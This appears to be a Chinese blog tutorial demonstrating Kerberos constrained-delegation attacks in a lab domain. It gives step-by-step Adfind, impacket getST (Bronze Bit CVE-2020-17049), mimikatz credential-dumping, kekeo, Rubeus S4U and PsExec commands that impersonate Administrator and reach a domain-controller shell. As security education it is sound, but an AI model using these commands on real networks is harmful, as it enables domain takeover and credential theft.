约束委派利用

置顶 已于 2023-03-26 00:46:29 修改
阅读量515 收藏 1
点赞数
分类专栏: 域安全 文章标签: 网络安全 系统安全 安全 信息安全 网络
于 2023-02-23 19:22:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18811919/article/details/129173584
版权

文章目录

非约束委派与约束委派的利用区别简介
之前我写过一篇非约束委派利用的文章,非约束委派其实就是拿到委派的机器权限,
诱导或者有过域管请求过非约束委派的机器而将自身的TGT票据缓存到委派机器的Lsass
进程中,主要是拿到TGT进行横向移动,约束委派相较于非约束委派就要安全很多了,他不会将
TGT缓存到委派机器上,而是转发ST服务票据因此要利用约束委派就需要该委派配置了到域控的
cifs服务才行。
配置约束委派
约束委派有两种:
1.仅使用Kerberos也就是不能进行协议转换(使用CVE-2020-17049 Kerberos Bronze Bit利用)。
2.使用任何身份验证协议,可以进行协议转换(常规利用即可)。

在这里插入图片描述

相较于非约束委派,约束委派必须配置相应的服务,且只能模拟委派账号访问特定配置好的
服务,下面进行配置到域控的CIFS服务。
1.查看域控机器名称

在这里插入图片描述

2.添加域控的cifs服务

在这里插入图片描述

使用Adfind查询配置了约束委派的信息
查询约束委派(配置约束委派的主机,并可以看到被委派的SPN)
	Adfind.exe -b "DC=test,DC=com" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto
查询约束委派(配置约束委派的服务账号,并可以看到被委派的SPN)
	Adfind.exe -b "DC=test,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto
可以看到USER-TEST机器账号配置了域控cifs的SPN具有可以利用的约束委派点。

在这里插入图片描述

仅使用Kerberos的约束委派利用(利用CVE-2020-17049 Kerberos Bronze Bit)
因为委派攻击的危害性,因此微软官方提供了多种配置来降低委派攻击的危害。首先可以通过禁止协议转换
仅使用Kerberos协议(即关闭TrustedToAuthForDelegation属性),其次是可以在AD中配置域内账户为“敏感账户,
不能被委派”CVE-2020-17049可以绕过此限制。
需要的工具:
	最新版本的impacket下的GetST.py脚本
环境配置:

在这里插入图片描述

就算配置了敏感账号也可以绕过。

在这里插入图片描述

默认命令:
	python3 getST.py -dc-ip 192.168.126.66 -spn cifs/WIN-CRJVMOIER7V.test.com -impersonate administrator test.com/WIN10YSWP$ -hashes :73ab588d404a01f7a3e74106d8f93440
	可以发现生成失败了因为配置的了仅使用Kerberos

在这里插入图片描述

利用CVE-2020-17049 Kerberos Bronze Bit 绕过
命令(加上-force-forwardable即可自动进行该漏洞利用):
	python3 getST.py -dc-ip 192.168.126.66 -spn cifs/WIN-CRJVMOIER7V.test.com -impersonate administrator test.com/WIN10YSWP$ -hashes :73ab588d404a01f7a3e74106d8f93440 -force-forwardable

在这里插入图片描述

成功绕过拿到票据。
使用mimikatz注入票据
mimikatz.exe "kerberos::ptc administrator.ccache" exit

在这里插入图片描述

使用微软的PsExec64.exe拿到域控shell
命令:
	PsExec64.exe \\WIN-CRJVMOIER7V.test.com\ powershell.exe

在这里插入图片描述

利用方式1(使用任何身份验证协议:使用机器账户的票据+kekeo票据请求TGS)
需要的工具:
	mimikatz.exe
	kekeo.exe
导出TGT票据
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"

在这里插入图片描述

申请服务票据
krbtgt可以看成是TGT票据,之后使用USER-TEST机器账号TGT请求 CIFS TGS服务票据,
模拟Administrator域管权限
kekeo.exe tgs::s4u /tgt:[0;3e4]-2-0-60a10000-WIN10YSWP$@krbtgt-TEST.COM.kirbi /user:Administrator@test.com /service:cifs/WIN-CRJVMOIER7V.test.com

在这里插入图片描述

导入票据
导入TGS_Administrator@test.com@TEST.COM_cifs~WIN-CRJVMOIER7V.test.com@TEST.COM.kirbi票据。
需要注意:如果域账号是敏感账号则不能进行委派则拿不到ST,如果委派模式是仅使用Kerberos也就是不能进
行协议转换也不能够拿到上述的票据只会返回一个票据。
mimikatz.exe "kerberos::ptt TGS_Administrator@test.com@TEST.COM_cifs~WIN-CRJVMOIER7V.test.com@TEST.COM.kirbi" "exit"

在这里插入图片描述

直接dir
dir \\WIN-CRJVMOIER7V.test.com\C$

在这里插入图片描述

使用微软的PsExec64.exe拿到域控shell
命令:
	PsExec64.exe \\WIN-CRJVMOIER7V.test.com\ powershell.exe

在这里插入图片描述

利用方式2(使用任何身份验证协议:机器账户的Hash值+Rubeus)
导出机器NTLM Hash
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
73ab588d404a01f7a3e74106d8f93440

在这里插入图片描述

使用Rubeus申请配置了约束委派机器账户WIN10YSWP$的TGT
Rubeus.exe asktgt /user:WIN10YSWP$ /rc4:73ab588d404a01f7a3e74106d8f93440 /domain:test.com /dc:WIN-CRJVMOIER7V.test.com /nowrap

在这里插入图片描述

使用Rubeus申请域管理员Administrator凭据,并注入内存。
需要注意:
	Administrator不能是敏感账号,敏感账号不能被委派。
	必须是使用任何身份验证协议的约束委派。
Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/WIN-CRJVMOIER7V.test.com /dc:WIN-CRJVMOIER7V.test.com /ptt /ticket:doIE5jCCBOKgAwIBBaEDAgEWooIEBTCCBAFhggP9MIID+aADAgEFoQobCFRFU1QuQ09Noh0wG6ADAgECoRQwEhsGa3JidGd0Gwh0ZXN0LmNvbaOCA8UwggPBoAMCARKhAwIBAqKCA7MEggOvXulBV9+rW8DuK2x27zfDJgNj+bUJEwMynFG/WoZ7dRtRv86cbyt5bKQDnWS5d1lozj+eYkJkCDheff1WowKPC1KOOMooafPY72MsvBGr0UIV29nXyL+h1LgHJSSSzq55R6XbCnVvC7o6UNQuOTL+zbG9JJ/mu/2+DTTwzXudvelYgeALr0vHi7t+6HjfUNtJz/jqqxVKTtNS15x9fd+FpbCzvZwZm9V4jf/nRkR8M1xhtzBXexhfWpjV0PQ2jgPaQo7Wyq3w/YsFJmE083zkojY4Gou9wSF/iPxq4U8ZbGapTM12UrtSPZrGeeg35NEAy62AsdOfy+ltLTqNjstwR/ZTlRO+2hBEzApbzBB5y7kssT4IVrqRqi8NASBWBW0NCpycI8CJy876ZtP2/REMBOUH7N7NupKa0T93jSxeTFYalG/Tx8CUndD7u1jT5EOnutKcgaP2zYGSxJRqPt+unuLE9EL/PtTcWTQ/zApRMPHtuIjMqa3YYTkkYkG3HlyCKLzv5WczhHE+phJRD4mEpFVuI7UQiOgewU0xSNA3PLr9qofHlBrCIlYmpb3LALiRq5kTVvk6tXrmfA4RtJyjzmEoEuvAwTclsJzmlXk5VyqfU8ofQGFXAE+nyuVzdmlYOmeWITc5Ucp1P0EiKrAgmrbKEt2RmVXMy0CB/p5tSGyyOrKEf1DZ7q+roVhBBZrulnHmR9KAg5vsqwAyuJaGYWL2cVa1U29vUW7Gl/2jR2jWlgXLcApCUq6lfRMMHb5AfSgopQyqk2ZiF5Pd6Ib4f0jJiMrhWp+8SczPTqXMsCW9iJS4Y+UuX+TwDFAqytYWUzqw6FDmtPahiwh/rydu0yisLcGO+oy9pts6Fl0U1bQRS/CTCF+u4VVm3DSmu8ispLF4DwTWzLFDKhKkPJ4k4zrUFa8fJW26vA1k1UaS8IKJA/x5H/uYFu+feR+Bqh3/XUBAoAThIuA5qWa/Nxtg5RXtme7wbrFa7Be0pyG4M6WxdqeyAat3PHtgDbznJUbaPe9/Ana3EPywQKHZrMjgGbHAT6jQnyUTPKWO3+Rsj06UHKy4vxrNgyJsQFGHFfWa987xMPdrsxXLHqoo7MFdLImKd92IEAtVxp7GJfQT0ngbvDuVlbNag2s6OpgU8K6oK9pR+MUotztk0wy7BXO8Ssip7kXbI6dRKSjkhlQ7a4wQXE6efvD49RTHjbKWjB78hh9VkeE1vEzZKv57c55aqZnBaBuLOYgWNuGv74Kfn6OBzDCByaADAgEAooHBBIG+fYG7MIG4oIG1MIGyMIGvoBswGaADAgEXoRIEEDQX0P2CzT4EMxKlPXQHkFahChsIVEVTVC5DT02iFzAVoAMCAQGhDjAMGwpXSU4xMFlTV1AkowcDBQBA4QAApREYDzIwMjMwMjIzMDg1MTIzWqYRGA8yMDIzMDIyMzE4NTEyM1qnERgPMjAyMzAzMDIwODUxMjNaqAobCFRFU1QuQ09NqR0wG6ADAgECoRQwEhsGa3JidGd0Gwh0ZXN0LmNvbQ==

在这里插入图片描述

dir \\WIN-CRJVMOIER7V.test.com\c$

在这里插入图片描述

使用微软的PsExec64.exe拿到域控shell
命令:
	PsExec64.exe \\WIN-CRJVMOIER7V.test.com\ powershell.exe

在这里插入图片描述

利用方式3(使用任何身份验证协议:Impacket工具使用机器账户的Hash值 | getST)
mimikatz获取机器账户NTLM Hash值
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
73ab588d404a01f7a3e74106d8f93440

在这里插入图片描述

使用getST申请服务票据
python3 getST.py -dc-ip 192.168.126.66 -spn cifs/WIN-CRJVMOIER7V.test.com -impersonate administrator test.com/WIN10YSWP$ -hashes :73ab588d404a01f7a3e74106d8f93440

在这里插入图片描述

KRB5CCNAME=administrator.ccache	导入票据
使用wmiexec登录域控
wmiexec.py -k test.com/administrator@WIN-CRJVMOIER7V.test.com -no-pass -dc-ip 192.168.126.66
登录失败因为kali没有在域内需要一个域内的机器代理

在这里插入图片描述

虚构之人
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
约束委派攻击
blue_fantasy的博客
01-25 3997
Text. 0x00 原理 回顾 首先回顾一下什么是委派? 服务/用户 主机名 用户A hostA 服务B hostB 服务C hostC 委派就是用户A委派主机hostB上的服务代表自己去访问了主机hostC上的服务C,委派需要提前在域控上进行配置,它可以理解成是一种权限。 约束委派原理 由于⾮约束委派的不安全性(配置了⾮约束
域控-笔记三(约束委派攻击,约束委派攻击)
5L2g556F5ZWl77yf
11-25 2587
文章目录一. 域委派1.1 域委派分类1.2 委派流程1.3 使用委派条件1.4 委派的一些原理二. 委派攻击2.1 约束委派攻击本地环境约束委派的查找 一. 域委派 1.1 域委派分类 约束委派(Unconstrained delegation) 服务账号可以获取被委派用户的TGT,并将TGT缓存到LSASS进程中,从而服务账号可使用该TGT,模拟用户访问任意服务。配置了约束委派的账户的userAccountControl 属性有个FLAG位 WORKSTATION_TRUSTED_FOR_DE
Impacket工具使用
qq_18811919的博客
02-22 2922
Impacket工具包使用
Kerberos Bronze Bit Attack(CVE-2020-17049) 绕过复现
whojoe的博客
07-21 359
前言 前面说到可以通过设置 高权限用户没有在特殊要求之下设置为不可委派 为了防止凭据被盗微软推出了Protected Users组,适用于Windows Server 2016,Windows Server 2012 R2、 Windows Server 2012 这个就是绕过这个策略的方法 环境搭建 主机 机器名 ip 用户 密码 版本 域控 ad.test.com 192.168.164.147 administrator Aa1234 win2012r2 域内机器 user.tes
基于资源约束委派利用
qq_18811919的博客
02-25 782
关于基于资源的约束委派本文章总共说了常用的三种利用方式: 1.Ntlm Relay+打印机bug+基于资源的约束委派拿下目标控制权 2.Acount Operators组权限滥用进行基于资源约束委派获取目标权限 3.拿下目标机器入域的域账号拿下目标控制权 以及一种绕过方式: 1.CVE-2020-17049 Kerberos Bronze Bit+基于资源的约束委派绕过敏感账号限制。
事件委派功能zsbd
08-18
事件委派功能,点击父类中子类每个元素都是触发事件,节省内存
java设计模式之委派模式原理分析
08-25
"java设计模式之委派模式原理分析" 委派模式(Delegate Pattern)是一种常用的设计模式,它允许对象将请求委托给另一个对象,以便完成特定的任务。在 Java 中,委派模式通常用于实现松耦合、灵活性高的系统设计。 ...
rbcd-attack:使用Impacket从外部进行基于Kerberos资源的约束委派攻击
04-01
滥用基于Kerberos资源的约束委派 TL; DR 此存储库是针对Windows Active Directory域中针对Kerberos资源的约束委派的实际攻击。 与其他常见实施方式的不同之处在于,我们是从Windows Domain外部发起攻击的,而不是...
Linux使用Sudo委派权限
09-15
今天小编就为大家分享一篇关于Linux使用Sudo委派权限的文章,小编觉得内容挺不错的,现在分享给大家,具有很好的参考价值,需要的朋友一起跟随小编来看看吧
C++中关于委派(Delegates)的实现示例
09-03
在C++编程中,委派(Delegate)是一种概念,它允许将函数或方法作为一个参数传递,通常用于事件处理或回调机制。尽管C++标准库并未直接支持委派,但可以通过某些技巧来模拟这一功能,特别是在C++11引入的新特性之后...
域内渗透约束委派
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
09-20 2528
域渗透约束委派利用
nopac 原理及复现
weixin_44747030的博客
10-04 4360
Nopac_ CVE-2021-42287/CVE-2021-42278复现
windows中关于委派(delegation)的理解
热门推荐
Shanfenglan's blog
09-24 17万+
CATALOG前言委派一些问题S4U2SELF延伸S4U2PROXY约束委派约束委派基于资源的约束委派基于委派的攻击约束委派攻击约束委派攻击基于资源的约束委派攻击 前言 委派一般出现在域环境中。它是一种机制,在kerberos认证的时候会涉及到。不正确的委派的配置,可能使攻击者达到提权的目的。 委派 假设域内用户A需要访问服务器B,并需要以A的身份对服务器的端数据库进行更改。则A就会进行一个kerberos认证,来获取访问B的ticket。这时候就需要用到委派,也就是说,A依旧访问B且只申请一个访
图片轮播
weixin_30548917的博客
08-22 452
图片轮播的大概功能: 图片是以滑动的方式出现的 可以点击按钮来滑动到上一张和下一张 当下一张没有了,就左滑到下一张。当上一张没有了,就右滑到最后一张 可以点击导航小圆点来跳转到指定的某一张 鼠标在图片外时,图片可以自动滑动 鼠标停留在图片上停止滑动   其中的难点,核心就是第一点和第三点,做完这两点图片轮播就做了一半了。滑动给人的感觉就是图片在一排,每次整排移动一张图片大小的...
Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)
chaojixiaojingang
12-22 1万+
1.漏洞描述 Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)是由于Active Directory 域服务没有进行适当的安全限制,导致可绕过安全限制进行权限提升。攻击者可利用该漏洞造成将域内的普通用户权限提升到域管理员权限等危害。 2.影响版本 CVE-2021-42287: Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Serve
Pytest官方文档学习笔记
一碗烈酒的博客
07-03 2405
pytest测试发现的约定: 如果未指定参数,则集合从testpaths(如果已配置)或当前目录开始。或者,命令行参数可用于目录、文件名或节点 ID 的任意组合。 递归到目录中,除它们匹配norecursedirs. 在这些目录中,搜索test_*.py或*_test.py文件,按其测试包名称导入。 从这些文件中,收集测试项目: test类外的前缀测试函数或方法 test前缀测试Test类中的前缀测试函数或方法(没有__init__方法) ..
附录 D:保护 Active Directory 中的内置 Administrator 帐户的安全
荒野求生的博客
12-08 367
https://docs.microsoft.com/zh-cn/windows/security/identity-protection/access-control/active-directory-accounts 适用于:Windows Server 2016、Windows Server 2012 R2、Windows Server 2012 附录 D:保护 Active Directory 中的内置 Administrator 帐户的安全 在 Active Directory 的...
Impacket官方使用指南
weixin_30877755的博客
04-09 2816
什么是Impacket Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。 有关某些工具的说明,请访问:https:/...
域渗透之委派攻击全集
include_voidmain的博客
08-22 486
域渗透之委派攻击全集
linuxdns委派
最新发布
02-01
Linux DNS委派是指在Linux操作系统中配置和管理域名系统(DNS)的委派过程。DNS委派是将特定的域名区域的管理权交给其他DNS服务器的过程。 在Linux中,DNS委派通常涉及到配置主DNS服务器和从DNS服务器。主DNS服务器负责管理顶级域名(例如.com、.net等),而从DNS服务器负责管理子域名(例如example.com、test.example.com等)。 要进行DNS委派,首先需要在主DNS服务器上创建一个区域文件,并在该文件中指定从DNS服务器的IP地址。然后,需要在主DNS服务器的配置文件中添加相应的区域配置,并重新加载DNS服务以使更改生效。 一旦DNS委派完成,主DNS服务器将不再负责管理子域名的解析请求,而是将这些请求转发给从DNS服务器处理。从DNS服务器将负责解析子域名的IP地址,并将结果返回给客户端。 通过DNS委派,可以实现更好的域名管理和分布式解析,提高系统的可靠性和性能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

虚构之人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值